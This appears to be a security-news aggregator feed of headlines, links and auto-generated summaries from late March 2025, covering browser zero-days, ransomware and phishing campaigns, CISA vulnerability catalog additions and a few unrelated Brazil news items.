    89% of healthcare organizations have the top 1% of riskiest Internet of Medical Things (IoMT) devices – which contain known exploitable vulnerabilities (KEVs) linked to active ransomware campaigns as well as an insecure connection to the internet – on their networks, according to Claroty. These figures represent a highly targeted, critical area where most security teams should prioritize their remediation efforts. The report is based on an analysis of over 2.25 million IoMT and 647,000 … More

    The post Healthcare’s alarming cybersecurity reality appeared first on Help Net Security.

    "

    Autosummary: 8% of imaging systems (X-rays, CT scans, MRI, ultrasound, and more) have KEVs linked to ransomware and insecure internet connectivity—making this the riskiest medical device category—impacting 85% of organizations. 20% of hospital information systems (HIS), which manage clinical patient data, as well as administrative and financial information, have KEVs linked to ransomware and insecure internet connectivity, impacting 58% of organizations. "


    Mozilla Patches Critical Firefox Bug Similar to Chrome’s Recent Zero-Day Vulnerability

    exploits
    2025-03-28 https://thehackernews.com/2025/03/mozilla-patches-critical-firefox-bug.html
    Mozilla has released updates to address a critical security flaw impacting its Firefox browser for Windows, merely days after Google patched a similar flaw in Chrome that came under active exploitation as a zero-day. The security vulnerability, CVE-2025-2857, has been described as a case of an incorrect handle that could lead to a sandbox escape. "Following the recent Chrome sandbox escape ( "

    Autosummary: "


    Product Walkthrough: How Datto BCDR Delivers Unstoppable Business Continuity

    ransomware
    2025-03-28 https://thehackernews.com/2025/03/how-to-ensure-business-continuity-with-datto-b.html
    Long gone are the days when a simple backup in a data center was enough to keep a business secure. While backups store information, they do not guarantee business continuity during a crisis. With IT disasters far too common and downtime burning through budgets, modern IT environments require solutions that go beyond storage and enable instant recovery to minimize downtime and data loss. This is "

    Autosummary: Additional recovery options: Datto BCDR provides granular and full-system recovery capabilities, including file and folder restore, volume restore, virtualization via hypervisor, bare metal restore and ESX upload. Lightning-fast recovery with Datto's 1-Click Disaster Recovery: Datto's 1-Click Disaster Recovery (1-Click DR) feature makes disaster recovery fast, effortless and reliable — as simple as reordering from your favorite fast-food app. Export backup images, including in RAW format: The Export Image function supports export to VMDK, VHD and VHDX formats and offers native RAW export for Linux-based hypervisors, including Proxmox, SCALE Computing Platform and OpenStack. Seamless local recovery for instant failover: Get powerful features for swift local recovery, including local virtualization, where Datto appliances double as local recovery targets, allowing businesses to host workloads and applications directly on the device. The immutable Datto Cloud: The Datto Cloud is purpose-built for cloud backup and DR, offering unmatched flexibility, security, performance and cost-efficiency. Effortless cloud recovery with the Datto Recovery Launchpad: What sets Datto apart is its purpose-built disaster recovery cloud, designed for fast, reliable and hassle-free recovery. "


    PJobRAT Malware Campaign Targeted Taiwanese Users via Fake Chat Apps

    exploits
    2025-03-28 https://thehackernews.com/2025/03/pjobrat-malware-campaign-targeted.html
    An Android malware family previously observed targeting Indian military personnel has been linked to a new campaign likely aimed at users in Taiwan under the guise of chat apps. "PJobRAT can steal SMS messages, phone contacts, device and app information, documents, and media files from infected Android devices," Sophos security researcher Pankaj Kohli said in a Thursday analysis. PJobRAT, first "

    Autosummary: "The apps have a basic chat functionality built-in, allowing users to register, login, and chat with other users (so, theoretically, infected users could have messaged each other, if they knew each others' user IDs)," Kohli said. "


    Mozilla fixed critical Firefox vulnerability CVE-2025-2857

    exploits
    2025-03-28 https://securityaffairs.com/175945/security/mozilla-fixed-critical-firefox-vulnerability-cve-2025-2857.html
    Mozilla addressed a critical vulnerability, tracked as CVE-2025-2857, impacting its Firefox browser for Windows. Mozilla has released security updates to address a critical flaw, tracked as CVE-2025-2857, impacting its Firefox browser for Windows. Recently, Google addressed a similar vulnerability, tracked as CVE-2025-2783, in Chrome that has been actively exploited in the wild as a zero-day. […] "

    Autosummary: Pierluigi Paganini, March 28, 2025. Mozilla addressed a critical vulnerability, tracked as CVE-2025-2857, impacting its Firefox browser for Windows. "


    New Ubuntu Linux security bypasses require manual mitigations

    Linux
    2025-03-28 https://www.bleepingcomputer.com/news/security/new-ubuntu-linux-security-bypasses-require-manual-mitigations/
    Three security bypasses have been discovered in Ubuntu Linux's unprivileged user namespace restrictions, which could enable a local attacker to exploit vulnerabilities in kernel components. [...] "

    Autosummary: Qualys provides technical details for the three bypass methods, which are summarized as follows: Bypass via aa-exec: Users can exploit the aa-exec tool, which allows running programs under specific AppArmor profiles. "


    VanHelsing ransomware: what you need to know

    exploits ransomware
    2025-03-28 https://www.tripwire.com/state-of-security/vanhelsing-ransomware-what-you-need-know
    First reported earlier in March 2025, VanHelsing is a new ransomware-as-a-service operation. Read more in my article on the Tripwire State of Security blog. "

    Autosummary: CIS member countries are all allied with Russia, and include a number of former Soviet republics: Armenia, Azerbaijan, Belarus, Kazakhstan, Kyrgyzstan, Moldova, Russia, Tajikistan and Uzbekistan. Why would VanHelsing affiliates be banned from attacking these countries? VanHelsing is unusual in targeting a variety of platforms - including Windows, Linux, BSD, ARM, and VMware ESXi - seemingly in an attempt to broaden its capacity to extort a ransom from impacted organisations. First reported earlier in March 2025, VanHelsing is a new ransomware-as-a-service operation. "


    Retail giant Sam’s Club investigates Clop ransomware breach claims

    exploits ransomware
    2025-03-28 https://www.bleepingcomputer.com/news/security/retail-giant-sams-club-investigates-clop-ransomware-breach-claims/
    Sam's Club, an American warehouse supermarket chain owned by U.S. retail giant Walmart, is investigating claims of a Clop ransomware breach. [...] "

    Autosummary: "This was not a breach of our systems, but rather a case of these parties obtaining user names and passwords from phishing campaigns, planting malware or breaches at other companies," a Sam's Club spokesperson told BleepingComputer at the time. "


    Phishing-as-a-service operation uses DNS-over-HTTPS for evasion

    financial
    2025-03-28 https://www.bleepingcomputer.com/news/security/phishing-as-a-service-operation-uses-dns-over-https-for-evasion/
    A newly discovered phishing-as-a-service (PhaaS) operation that researchers call Morphing Meerkat, has been using the DNS over HTTPS (DoH) protocol to evade detection. [...] "

    Autosummary: The operation can impersonate more than 114 email and service providers, including Gmail, Outlook, Yahoo, DHL, Maersk, and RakBank, delivering messages with subject lines crafted to prompt urgent action like “Action Required: Account Deactivation.” "


    Vulnerability in most browsers abused in targeted attacks

    exploits
    2025-03-28 https://www.malwarebytes.com/blog/news/2025/03/vulnerability-in-most-browsers-abused-in-targeted-attacks
    A vulnerability has been found that can be exploited through every browser as long as it's running on a Windows system "

    Autosummary: Chrome up to date The vulnerability exists in Windows for all Chromium based browsers, including Edge, Brave, Vivaldi, and Opera. "


    Russian authorities arrest three suspects behind Mamont Android banking trojan

    financial exploits rusia-ucrania
    2025-03-28 https://securityaffairs.com/175935/cyber-crime/russian-authorities-arrest-three-suspects-behind-mamont-android-banking-trojan.html
    Russian authorities arrested three suspects for developing Mamont, a newly identified Android banking trojan. Russian authorities arrested three suspects in Saratov for developing Mamont (Russian for mammoth), a recently discovered Android banking trojan. “Three Saratov residents are suspected of fraud and unauthorized access to computer information. Officers from the fraud prevention department of PJSC Sberbank […] "

    Autosummary: Pierluigi Paganini, March 28, 2025. Russian authorities arrested three suspects for developing Mamont, a newly identified Android banking trojan. "


    Crooks are reviving the Grandoreiro banking trojan

    financial exploits
    2025-03-28 https://securityaffairs.com/175964/malware/crooks-are-reviving-the-grandoreiro-banking-trojan.html
    Grandoreiro Banking Trojan resurfaces, targeting users in Latin America and Europe in new phishing campaigns. Forcepoint X-Labs researchers warn of new phishing campaigns targeting Latin America and Europe. The Trojan has been active since 2016; it initially targeted Brazil but has expanded to Mexico, Portugal, and Spain since 2020. Grandoreiro is a modular […] "

    Autosummary: Grandoreiro is a modular backdoor that supports the following capabilities: keylogging; auto-updating to newer versions and modules; web injects and restricting access to specific websites; command execution; manipulating windows; guiding the victim's browser to a certain URL; C2 domain generation via DGA (Domain Generation Algorithm). "


    UK fines software provider £3.07 million for 2022 ransomware breach

    exploits ransomware
    2025-03-27 https://www.bleepingcomputer.com/news/security/uk-fines-software-provider-307-million-for-2022-ransomware-breach/
    The UK Information Commissioner's Office (ICO) has fined Advanced Computer Software Group Ltd £3.07 million over a 2022 ransomware attack that exposed the sensitive personal data of 79,404 people, including National Health Service (NHS) patients. [...] "

    Autosummary: "


    NHS software provider fined £3m over data breach after ransomware attack

    financial exploits ransomware
    2025-03-27 https://www.bbc.com/news/articles/cp3yv1zxn94o
    Security failings by the Advanced Computer Software Group led to a cyberattack in 2022 that impacted NHS services. "

    Autosummary: Last year, the regulator criticised Advanced over the incident, which placed "further strain" on a "sector already under pressure". "


    Hottest cybersecurity open-source tools of the month: March 2025

    ciber
    2025-03-27 https://www.helpnetsecurity.com/2025/03/27/hottest-cybersecurity-open-source-tools-of-the-month-march-2025/

    This month’s roundup features exceptional open-source cybersecurity tools that are gaining attention for strengthening security across various environments. Hetty: Open-source HTTP toolkit for security research Hetty is an open-source HTTP toolkit designed for security research, offering a free alternative to commercial tools like Burp Suite Pro. Fix Inventory: Open-source cloud asset inventory tool Fix Inventory is an open-source tool for detecting compliance and security risks in cloud infrastructure accounts. Commix: Open-source OS command injection exploitation … More

    The post Hottest cybersecurity open-source tools of the month: March 2025 appeared first on Help Net Security.

    "

    Autosummary: "


    CISA Warns of Sitecore RCE Flaws; Active Exploits Hit Next.js and DrayTek Devices

    exploits
    2025-03-27 https://thehackernews.com/2025/03/cisa-flags-two-six-year-old-sitecore.html
    The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added two six-year-old security flaws impacting Sitecore CMS and Experience Platform (XP) to its Known Exploited Vulnerabilities (KEV) catalog, based on evidence of active exploitation. The vulnerabilities are listed below - CVE-2019-9874 (CVSS score: 9.8) - A deserialization vulnerability in the Sitecore.Security.AntiCSRF "

    Autosummary: The threat intelligence firm said it has observed in-the-wild activity against the below CVE identifiers: CVE-2020-8515 (CVSS score: 9.8), an operating system command injection vulnerability in multiple DrayTek router models that could allow remote code execution as root via shell metacharacters to the cgi-bin/mainfunction.cgi URI; CVE-2021-20123 (CVSS score: 7.5), a local file inclusion vulnerability in DrayTek VigorConnect that could allow an unauthenticated attacker to download arbitrary files from the underlying operating system with root privileges via the DownloadFileServlet endpoint; CVE-2021-20124 (CVSS score: 7.5), a local file inclusion vulnerability in DrayTek VigorConnect that could allow an unauthenticated attacker to download arbitrary files from the underlying operating system with root privileges via the WebServlet endpoint. Indonesia, Hong Kong, and the United States have emerged as the top destination countries of the attack traffic for CVE-2020-8515, while Lithuania, the United States, and Singapore have been singled out as part of attacks exploiting CVE-2021-20123 and CVE-2021-20124. "


    Smashing Security podcast #410: Unleash the AI bot army against the scammers – now!

    financial
    2025-03-27 https://grahamcluley.com/smashing-security-podcast-410/
    A YouTuber has unleashed an innovative AI bot army to disrupt and outwit the world of online scammers, and a New York Times investigation looks into the intricate web of global money laundering. All this and more is discussed in the latest edition of the award-winning "Smashing Security" podcast by computer security veterans Graham Cluley and Carole Theriault. "

    Autosummary: Hosts: Graham Cluley: @grahamcluley.com @[email protected] Carole Theriault: @caroletheriault Episode links: Sponsored by: Vanta – Expand the scope of your security program with market-leading compliance automation… while saving time and money. "


    CrushFTP: Patch critical vulnerability ASAP! (CVE-2025-2825)

    exploits
    2025-03-27 https://www.helpnetsecurity.com/2025/03/27/crushftp-vulnerability-cve-2025-2825/

    CrushFTP has fixed a critical vulnerability (CVE-2025-2825) in its enterprise file transfer solution that could be exploited by remote, unauthenticated attackers to access vulnerable internet-facing servers (and likely the data stored on them). Attackers, especially ransomware gangs, have a penchant for leveraging 0-day and n-day vulnerabilities in MOVEit Transfer, Cleo, Citrix ShareFile, and other enterprise-grade file transfer and sharing solutions. Attackers have been known to exploit previous CrushFTP vulnerabilities, but there is currently no evidence … More

    The post CrushFTP: Patch critical vulnerability ASAP! (CVE-2025-2825) appeared first on Help Net Security.

    "

    Autosummary: "


    Top 3 MS Office Exploits Hackers Use in 2025 – Stay Alert!

    exploits
    2025-03-27 https://thehackernews.com/2025/03/top-3-ms-office-exploits-hackers-use-in.html
    Hackers have long used Word and Excel documents as delivery vehicles for malware, and in 2025, these tricks are far from outdated. From phishing schemes to zero-click exploits, malicious Office files are still one of the easiest ways into a victim’s system. Here are the top three Microsoft Office-based exploits still making the rounds this year and what you need to know to avoid them. 1. "

    Autosummary: These documents might include: links to fake Microsoft 365 login pages; phishing portals that mimic company tools or services; redirect chains that eventually land on credential-harvesting sites. In this ANY.RUN malware analysis session, an Excel file contains a malicious phishing link (view analysis session with Excel file; Excel file containing malicious link detected inside ANY.RUN sandbox). When clicked, the victim is taken to a webpage that shows a Cloudflare "Verify you're a human" check. With ANY.RUN's new Android OS support, your security team can now: analyze Android malware in a real mobile environment; investigate suspicious APK behavior before it hits production devices; respond to mobile threats faster and with more clarity; support incident response across both desktop and mobile ecosystems. It's a big step toward complete coverage and it's available on all plans, including free. View analysis session with malicious payload (phishing email containing malicious Excel attachment). In the MITRE ATT&CK section of this analysis, we can see how the ANY.RUN sandbox detected this specific technique used in the attack (exploitation of Equation Editor detected by ANY.RUN). Although Microsoft patched the vulnerability years ago, it's still useful for attackers targeting systems that haven't been updated. "


    Arkana Security group claims the hack of US telco provider WideOpenWest (WOW!)

    Telcos
    2025-03-27 https://securityaffairs.com/175905/data-breach/arkana-security-group-claims-the-hack-of-wideopenwest-wow.html
    Arkana Security, a new ransomware group, claims to have breached the telecommunications provider WideOpenWest (WOW!). The new ransomware group Arkana Security claims to have hacked US telecom provider WOW!, stealing customer data. WideOpenWest (WOW!) is a US-based telecommunications company that provides broadband internet, cable TV, and phone services. It operates mainly in the Midwest and […] "

    Autosummary: Pierluigi Paganini, March 27, 2025. Arkana Security, a new ransomware group, claims to have breached the telecommunications provider WideOpenWest (WOW!). Arkana claimed to have breached WOW!’s internal systems, including the AppianCloud and Symphonica platforms: “A major cyber attack reaps Wide Open West (WOW!), a leading Internet Service Provider with over 1.5 million customers. "


    Dozens of solar inverter flaws could be exploited to attack power grids

    exploits
    2025-03-27 https://www.bleepingcomputer.com/news/security/dozens-of-solar-inverter-flaws-could-be-exploited-to-attack-power-grids/
    Dozens of vulnerabilities in products from three leading makers of solar inverters, Sungrow, Growatt, and SMA, could be exploited to control devices or execute code remotely on the vendor's cloud platform. [...] "

    Autosummary: "When the primary control decreases the load at its maximum capacity, the attack will reduce all its load immediately, forcing the primary control to raise the load in the system followed by an immediate increase of the load by the attack" - Forescout Vedere Labs. Apart from disrupting a power grid, the disclosed vulnerabilities can also be exploited in scenarios that impact user privacy, hijacking smart devices in the house that may be controlled through the vendor's cloud platform, or even ransomware attacks by holding the devices hostage until a ransom is paid. "


    A closer look at The Ultimate Cybersecurity Careers Guide

    ciber
    2025-03-27 https://www.helpnetsecurity.com/2025/03/27/kim-crawley-ultimate-cybersecurity-careers-guide/

    In this Help Net Security interview, Kim Crawley, cybersecurity expert and Professor at the Open Institute of Technology, discusses her latest book, The Ultimate Cybersecurity Careers Guide. She shares insights on how aspiring professionals can break into the field and explores the importance of continuous learning. What makes this guide different from other available cybersecurity career resources? That’s an excellent question. The vast majority of books on cybersecurity certifications are guides to one particular certification … More

    The post A closer look at The Ultimate Cybersecurity Careers Guide appeared first on Help Net Security.

    "

    Autosummary: Each of the big vendor neutrals (i.e., CompTIA, ISC2, etc.) has a chapter, and each of the big vendor specifics (i.e., Microsoft, AWS, etc.) has a chapter too. In this Help Net Security interview, Kim Crawley, cybersecurity expert and Professor at the Open Institute of Technology, discusses her latest book, The Ultimate Cybersecurity Careers Guide. I cowrote The Pentester Blueprint, I wrote a detailed manual on cloud “pentesting” (actually, it’s vuln scanning), I worked for Hack The Box, I did a SANS talk on pentesting reports. I personally have had CompTIA A+, Network+, Security+, and ISC2 CISSP, but that’s it. There are a handful of great cybersecurity career advice YouTubers, subreddits, social media accounts, and so on. I explain most of the common cybersecurity roles in detail, the upsides and downsides of each of them, which certs may be relevant, and how to network to get those jobs. Employers should only ask for CISSPs for roles that require a lot of previous industry experience, in SecOps, security architecture, or security leadership. But, if for example, someone gets an $800 bug bounty reward here or there, that can lead to application security and application pentesting jobs that do provide a full time income. While my readers work on becoming employable humans, I urge you to bypass GenAI in search engines, do your own thinking, and come up with your own ideas when you’re doing any sort of creative or cognitive work. "


    APT36 Spoofs India Post Website to Infect Windows and Android Users with Malware

    exploits
    2025-03-27 https://thehackernews.com/2025/03/apt36-spoofs-india-post-website-to.html
    An advanced persistent threat (APT) group with ties to Pakistan has been attributed to the creation of a fake website masquerading as India's public sector postal system as part of a campaign designed to infect both Windows and Android users in the country. Cybersecurity company CYFIRMA has attributed the campaign with medium confidence to a threat actor called APT36, which is also known as "

    Autosummary: "ClickFix is increasingly being exploited by cybercriminals, scammers, and APT groups, as reported by other researchers observing its use in the wild," CYFIRMA said. "


    Crooks target DeepSeek users with fake sponsored Google ads to deliver malware

    exploits
    2025-03-27 https://securityaffairs.com/175923/malware/crooks-deepseek-users-with-fake-sponsored-google-ads-to-deliver-malware.html
    Cybercriminals are exploiting the popularity of DeepSeek by using fake sponsored Google ads to distribute malware. While DeepSeek is rising in popularity, threat actors are attempting to exploit it by using fake sponsored Google ads to distribute malware, Malwarebytes researchers warn. Crooks are using DeepSeek as a lure to trap unsuspecting Google searchers. “Unfortunately, we […] "

    Autosummary: In January, Italy’s Data Protection Authority Garante asked the AI firm DeepSeek to clarify its data collection, sources, purposes, legal basis, and storage, citing potential risks to user data. "


    U.S. CISA adds Sitecore CMS and XP, and GitHub Action flaws to its Known Exploited Vulnerabilities catalog

    exploits
    2025-03-27 https://securityaffairs.com/175915/security/u-s-cisa-adds-sitecore-cms-and-xp-and-github-action-flaws-to-its-known-exploited-vulnerabilities-catalog.html
    U.S. Cybersecurity and Infrastructure Security Agency (CISA) adds Sitecore CMS and XP, and GitHub Action flaws to its Known Exploited Vulnerabilities catalog. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added [1,2] the following vulnerabilities to its Known Exploited Vulnerabilities (KEV) catalog: CVE-2019-9875 (CVSS score of 8.8) is a Deserialization of Untrusted Data in the anti […] "

    Autosummary: "


    Chinese FamousSparrow hackers deploy upgraded malware in attacks

    exploits
    2025-03-27 https://www.bleepingcomputer.com/news/security/chinese-famoussparrow-hackers-deploy-upgraded-malware-in-attacks/
    A China-linked cyberespionage group known as "FamousSparrow" was observed using a new modular version of its signature backdoor "SparrowDoor" against a US-based trade organization. [...] "

    Autosummary: The operations these plugins support include: shell access, file system manipulation, keylogging, proxying, screenshot capturing, file transfer, and process listing/killing. The ShadowPad connection: Another interesting finding in ESET's report is FamousSparrow's use of ShadowPad, a versatile modular remote access trojan (RAT) associated with several Chinese APTs. "


    New Morphing Meerkat Phishing Kit Mimics 114 Brands Using Victims’ DNS Email Records

    financial industry
    2025-03-27 https://thehackernews.com/2025/03/new-morphing-meerkat-phishing-kit.html
    Cybersecurity researchers have shed light on a new phishing-as-a-service (PhaaS) platform that leverages the Domain Name System (DNS) mail exchange (MX) records to serve fake login pages that impersonate about 114 brands. DNS intelligence firm Infoblox is tracking the actor behind the PhaaS, the phishing kit, and the related activity under the moniker Morphing Meerkat. "The threat actor behind "

    Autosummary: "


    U.S. CISA adds Google Chromium Mojo flaw to its Known Exploited Vulnerabilities catalog

    exploits
    2025-03-27 https://securityaffairs.com/175936/security/u-s-cisa-adds-google-chromium-mojo-flaw-to-its-known-exploited-vulnerabilities-catalog.html
    U.S. Cybersecurity and Infrastructure Security Agency (CISA) adds Google Chromium Mojo flaw to its Known Exploited Vulnerabilities catalog. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added a Google Chromium Mojo sandbox escape vulnerability, tracked as CVE-2025-2783, to its Known Exploited Vulnerabilities (KEV) catalog. This week Google has released out-of-band fixes to address a high-severity security […] "

    Autosummary: Pierluigi Paganini, March 27, 2025. U.S. Cybersecurity and Infrastructure Security Agency (CISA) adds Google Chromium Mojo flaw to its Known Exploited Vulnerabilities catalog. "


    Google fixes Chrome zero-day exploited in espionage campaign

    exploits
    2025-03-26 https://www.bleepingcomputer.com/news/security/google-fixes-chrome-zero-day-exploited-in-espionage-campaign/
    Google has fixed a high-severity Chrome zero-day vulnerability exploited to escape the browser's sandbox and deploy malware in espionage attacks targeting Russian organizations. [...] "

    Autosummary: While it tagged CVE-2025-2783 as exploited in attacks, Google has yet to share further details regarding these incidents and said that "access to bug details and links may be kept restricted until a majority of users are updated with a fix." However, Kaspersky researchers who discovered the actively exploited zero-day also published a report with additional details, saying that attackers use CVE-2025-2783 exploits to bypass Chrome sandbox protections and infect targets with sophisticated malware. "


    Zero-Day Alert: Google Releases Chrome Patch for Exploit Used in Russian Espionage Attacks

    exploits rusia-ucrania
    2025-03-26 https://thehackernews.com/2025/03/zero-day-alert-google-releases-chrome.html
    Google has released out-of-band fixes to address a high-severity security flaw in its Chrome browser for Windows that it said has been exploited in the wild as part of attacks targeting organizations in Russia.  The vulnerability, tracked as CVE-2025-2783, has been described as a case of "incorrect handle provided in unspecified circumstances in Mojo on Windows." Mojo refers to a "

    Autosummary: The Russian cybersecurity vendor, in its own bulletin, characterized the zero-day exploitation of CVE-2025-2783 as a technically sophisticated targeted attack, indicative of an advanced persistent threat (APT). "


    Google fixes exploited Chrome sandbox bypass zero-day (CVE-2025-2783)

    exploits
    2025-03-26 https://www.helpnetsecurity.com/2025/03/26/google-fixes-exploited-chrome-sandbox-bypass-zero-day-cve-2025-2783/

    Google is in the process of rolling out Chrome v134.0.6998.178 to Windows users to fix CVE-2025-2783, a zero-day vulnerability that allowed attackers to bypass Chrome sandbox protections. The vulnerability was flagged by Kaspersky researchers, who discovered it being exploited by a suspected state-sponsored APT group to target media outlets and educational institutions in Russia. About CVE-2025-2783 Google explains the source of the flaw thus: “Incorrect handle provided in unspecified circumstances in Mojo on Windows.” … More

    The post Google fixes exploited Chrome sandbox bypass zero-day (CVE-2025-2783) appeared first on Help Net Security.

    "

    Autosummary: Researchers Igor Kuznetsov and Boris Larin say that the cause of CVE-2025-2783 was “a logical error at the intersection of Google Chrome’s sandbox and the Windows operating system,” and that it initially left them scratching their heads: “Without doing anything obviously malicious or forbidden, it allowed the attackers to bypass Google Chrome’s sandbox protection as if it didn’t even exist.” "


    How PAM Mitigates Insider Threats: Preventing Data Breaches, Privilege Misuse, and More

    financial Linux
    2025-03-26 https://thehackernews.com/2025/03/how-pam-mitigates-insider-threats.html
    When people think of cybersecurity threats, they often picture external hackers breaking into networks. However, some of the most damaging breaches stem from within organizations. Whether through negligence or malicious intent, insiders can expose your organization to significant cybersecurity risks. According to Verizon's 2024 Data Breach Investigations Report, 57% of companies experience over "

    Autosummary: PAM solutions streamline compliance by providing detailed logs of privileged account activities, simplifying the auditing process, and ensuring adherence to standards, laws, and regulations such as the GDPR, PCI DSS, and NIS2. This efficiency leads to increased productivity, as users can access necessary systems promptly without compromising security. Overall, implementing a robust PAM solution not only fortifies your organization's security against insider threats but also delivers a multitude of benefits that drive operational efficiency, regulatory compliance, and productivity growth. Automating insider threat response: With the automation provided by PAM solutions, organizations significantly reduce the time to detect and respond to insider threats, minimizing potential financial, operational, and reputational damage. The consequences of insider threats range from financial losses and reputational damage to severe penalties for non-compliance with critical cybersecurity laws, regulations, and standards like GDPR, NIS2, or HIPAA. "


    Google fixed the first actively exploited Chrome zero-day since the start of the year

    exploits
    2025-03-26 https://securityaffairs.com/175862/hacking/google-fixed-first-chrome-zero-day-in-2025.html
    Google fixed a flaw in the Chrome browser for Windows that was actively exploited in attacks targeting organizations in Russia. Google has released out-of-band fixes to address a high-severity security vulnerability, tracked as CVE-2025-2783, in Chrome browser for Windows. The flaw was actively exploited in attacks targeting organizations in Russia. The vulnerability is an incorrect handle […]



    RedCurl cyberspies create ransomware to encrypt Hyper-V servers

    exploits ransomware
    2025-03-26 https://www.bleepingcomputer.com/news/security/redcurl-cyberspies-create-ransomware-to-encrypt-hyper-v-servers/
    A threat actor named "RedCurl," known for stealthy corporate espionage operations since 2018, is now using a ransomware encryptor designed to target Hyper-V virtual machines. [...]

    Autosummary: While most ransomware operations focus on targeting VMware ESXi servers, RedCurl's new "QWCrypt" ransomware specifically targets virtual machines hosted on Hyper-V. QWCrypt attacks: the attacks observed by Bitdefender start with phishing emails with ".IMG" attachments disguised as CVs.


    Fake Booking.com phish uses fake CAPTCHAs to trick hotel staff into downloading malware

    exploits
    2025-03-26 https://www.malwarebytes.com/blog/news/2025/03/fake-booking-com-phish-uses-fake-captchas-to-trick-hotel-staff-into-downloading-malware
    Fake Booking.com emails sent to hotels lead to fake Captcha sites that trick the staff into infecting their own systems.

    Autosummary: Please find the details below: Reservation number: 5124588434141 Guest Name: Margit Kainz Check-in Date: 2025-03-25 Check-out Date: 2025-04-01 Room Type: Deluxe Double Room Guests: 2 Adults Special Requests: Early check-in requested (before 2 PM) Payment Status: Payment at property {link to landing page} (Copy and paste this link in your browser to confirm booking)


    DeepSeek users targeted with fake sponsored Google ads that deliver malware

    exploits
    2025-03-26 https://www.malwarebytes.com/blog/news/2025/03/deepseek-users-targeted-with-fake-sponsored-google-ads-that-deliver-malware
    With its growing popularity, sponsored Google search ads have started impersonating DeepSeek AI.

    Autosummary: Here’s the fake ad: If you put it side by side with the real DeepSeek ads, the difference is relatively easy to spot: But as an unsuspecting searcher, you aren’t likely to make that comparison, and as you may know from previous posts about fake Google sponsored ads, the criminals behind these campaigns can be a lot more convincing.


    If you think you’re immune to phishing attempts, you’re wrong!

    financial
    2025-03-26 https://www.helpnetsecurity.com/2025/03/26/troy-hunt-mailchimp-phishing-email/

    Security consultant Troy Hunt, the creator of the Have I Been Pwned (HIBP) service, has revealed that he got tricked by a clever phishing email, and that the attacker gained access to his Mailchimp account and stole a list of email addresses of his newsletter subscribers. Commendably, he added the compromised data – email and IP addresses, rough geolocation data – to HIBP, so that users may check whether theirs is included or get notified … More

    The post If you think you’re immune to phishing attempts, you’re wrong! appeared first on Help Net Security.


    Autosummary: The email does not address the recipient by name and the email address from which it was sent does not look like it might belong to Mailchimp (hr@group-f.be) but, as he explained: he was jet-lagged and tired; Outlook on iOS, which he initially used to read the email, did not render the email address, just the spoofed sender name (“MailChimp Account Services”).


    DeRISK Quantified Vulnerability Management evaluates cyber risks using business-level metrics

    exploits industry
    2025-03-26 https://www.helpnetsecurity.com/2025/03/26/derisk-quantified-vulnerability-management/

    DeNexus announced an innovative enhancement to its cyber risk management flagship solution DeRISK. The new DeRISK Quantified Vulnerability Management leverages advanced AI techniques to automatically and continuously map common vulnerabilities and exposures (CVEs) to potential financial impacts, providing insights for cybersecurity teams. This new solution will revolutionize vulnerability management in OT environments by addressing the overwhelming challenge of prioritizing CVEs, reducing the task to only those that drive financial exposure, and transforming how organizations … More

    The post DeRISK Quantified Vulnerability Management evaluates cyber risks using business-level metrics appeared first on Help Net Security.


    Autosummary: “In addition to layering in exploit metrics like EPSS and KEV, we must understand the context and exposure of identified vulnerabilities—using DeRISK’s wealth of outside-in and inside-out data, we can now prioritize remediation at scale, while also having financial data to support risk-acceptance decisions.”


    EncryptHub Exploits Windows Zero-Day to Deploy Rhadamanthys and StealC Malware

    exploits
    2025-03-26 https://thehackernews.com/2025/03/encrypthub-exploits-windows-zero-day-to.html
    The threat actor known as EncryptHub exploited a recently-patched security vulnerability in Microsoft Windows as a zero-day to deliver a wide range of malware families, including backdoors and information stealers such as Rhadamanthys and StealC. "In this attack, the threat actor manipulates .msc files and the Multilingual User Interface Path (MUIPath) to download and execute malicious payload,

    Autosummary: files. Using the ExecuteShellCommand method of MMC to download and execute a next-stage payload on the victim's machine, an approach previously documented by Dutch cybersecurity company Outflank in August 2024. Using mock trusted directories such as "C:\Windows \System32" (note the space after Windows) to bypass User Account Control (UAC) and drop a malicious .msc file called "WmiMgmt.msc". Trend Micro said the attack chains likely begin with victims downloading digitally-signed Microsoft installer (MSI) files impersonating legitimate Chinese software like DingTalk or QQTalk, which is then used to fetch and execute the loader from a remote server.


    RedCurl Shifts from Espionage to Ransomware with First-Ever QWCrypt Deployment

    exploits ransomware
    2025-03-26 https://thehackernews.com/2025/03/redcurl-shifts-from-espionage-to.html
    The Russian-speaking hacking group called RedCurl has been linked to a ransomware campaign for the first time, marking a departure in the threat actor's tradecraft. The activity, observed by Romanian cybersecurity company Bitdefender, involves the deployment of a never-before-seen ransomware strain dubbed QWCrypt. RedCurl, also called Earth Kapre and Red Wolf, has a history of orchestrating

    Autosummary: RedCurl, also called Earth Kapre and Red Wolf, has a history of orchestrating corporate espionage attacks aimed at various entities in Canada, Germany, Norway, Russia, Slovenia, Ukraine, the United Kingdom, and the United States.


    BlackLock Ransomware Targeted by Cybersecurity Firm

    exploits ransomware ciber
    2025-03-26 https://securityaffairs.com/175877/cyber-crime/blacklock-ransomware-targeted-by-cybersecurity-firm.html
    Resecurity found an LFI flaw in the leak site of BlackLock ransomware, exposing clearnet IPs and server details. Resecurity has identified a Local File Include (LFI) vulnerability in the Data Leak Site (DLS) of BlackLock Ransomware. Cybersecurity experts were able to exploit a misconfiguration in the vulnerable web app used by ransomware operators to publish victims’ data – leading […]

    Autosummary: The impacted organizations were based in Argentina, Aruba, Brazil, Canada, Congo, Croatia, Peru, France, Italy, Spain, the Netherlands, the United States, the United Kingdom, and the UAE.


    What's going on with Brazil?

    latam
    2025-03-26 https://www.bbc.com/sport/football/articles/cpq2rzd7ryro
    South American football writer Tim Vickery analyses what is going wrong for Brazil following their 4-1 defeat by Argentina.



    StreamElements discloses third-party data breach after hacker leaks data

    financial
    2025-03-26 https://www.bleepingcomputer.com/news/security/streamelements-discloses-third-party-data-breach-after-hacker-leaks-data/
    Cloud-based streaming company StreamElements confirms it suffered a data breach at a third-party service provider after a threat actor leaked samples of stolen data on a hacking forum. [...]

    Autosummary: "I attempted to verify the legitimacy of the data breach by requesting my own personal details from orders placed in 2021 or 2022," explained Bussey on X. "Seconds later, they provided that information, including my name, address, postal code, phone number, and email."


    Brazil's Bolsonaro to stand trial on coup charges, court rules

    latam
    2025-03-26 https://www.bbc.com/news/articles/c1d4v3dwn03o
    Brazil's top court has ruled that there is enough evidence to warrant that Jair Bolsonaro be put on trial.



